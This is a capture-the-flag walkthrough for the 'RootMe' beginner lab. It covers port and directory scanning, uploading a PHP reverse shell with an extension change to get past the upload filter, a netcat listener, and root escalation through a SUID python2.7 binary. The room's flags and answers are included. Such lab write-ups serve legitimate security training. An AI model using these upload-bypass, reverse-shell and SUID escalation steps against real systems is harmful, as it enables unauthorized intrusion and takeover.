Writeup Aria
challengesB2rEasy

RootMe

A ctf for beginners, can you root me?

Solution

Reconnaissance

nmap -sV -T4 10.49.182.229
# PORT   STATE SERVICE VERSION
# 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
# 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
# Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster dir -u http://10.49.182.229 -w /usr/share/wordlists/dirb/common.txt
# /css                  (Status: 301) [Size: 312] [--> http://10.49.182.229/css/]
# /index.php            (Status: 200) [Size: 616]
# /js                   (Status: 301) [Size: 311] [--> http://10.49.182.229/js/]
# /panel                (Status: 301) [Size: 314] [--> http://10.49.182.229/panel/]
# /uploads              (Status: 301) [Size: 316]

go to http://10.49.182.229/panel, and upload reverse shell php file.

ip a
# 10.49.105.206

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
mv php-reverse-shell.php shell.php
nano shell.php

nc -lvnp 9001

jika upload shell.php gagal, coba ganti ekstensi file menjadi .phtml atau .php5

shell.php 1768146078514

shell.php5 1768146105562

setelah itu pergi ke http://10.49.182.229/uploads/shell.php5

maka nanti di terminal yang sedang menjalankan nc akan mendapatkan shell

1768146170642

upgrade shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Getting a shell

cat user.txt
THM{y0u_g0t_a_sh3ll}

Privilege escalation

find / -type f -perm -4000 2>/dev/null
# /usr/lib/dbus-1.0/dbus-daemon-launch-helper
# /usr/lib/snapd/snap-confine
# /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
# /usr/lib/eject/dmcrypt-get-device
# /usr/lib/openssh/ssh-keysign
# /usr/lib/policykit-1/polkit-agent-helper-1
# /usr/bin/newuidmap
# /usr/bin/newgidmap
# /usr/bin/chsh
# /usr/bin/python2.7
# /usr/bin/at
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/sudo
# /usr/bin/newgrp
# /usr/bin/passwd
# /usr/bin/pkexec

# /usr/bin/python2.7 looks weird, let's check it
/usr/bin/python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
whoami
# root
cat /root/root.txt
# THM{pr1v1l3g3_3sc4l4t10n}

Answers

Reconnaissance

  • Scan the machine, how many ports are open?

2

  • What version of Apache is running?

2.4.41

  • What service is running on port 22?

ssh

  • Find directories on the web server using the GoBuster tool.

/panel/

  • What is the hidden directory?

/uploads/

Getting a shell

  • user.txt

THM{y0u_g0t_a_sh3ll}

Privilege escalation

  • Search for files with SUID permission, which file is weird?

/usr/bin/python

  • root.txt

THM{pr1v1l3g3_3sc4l4t10n}

Gaming Server

Previous Page

Simple CTF

Next Page

On this page

SolutionReconnaissanceGetting a shellPrivilege escalationAnswersReconnaissanceGetting a shellPrivilege escalation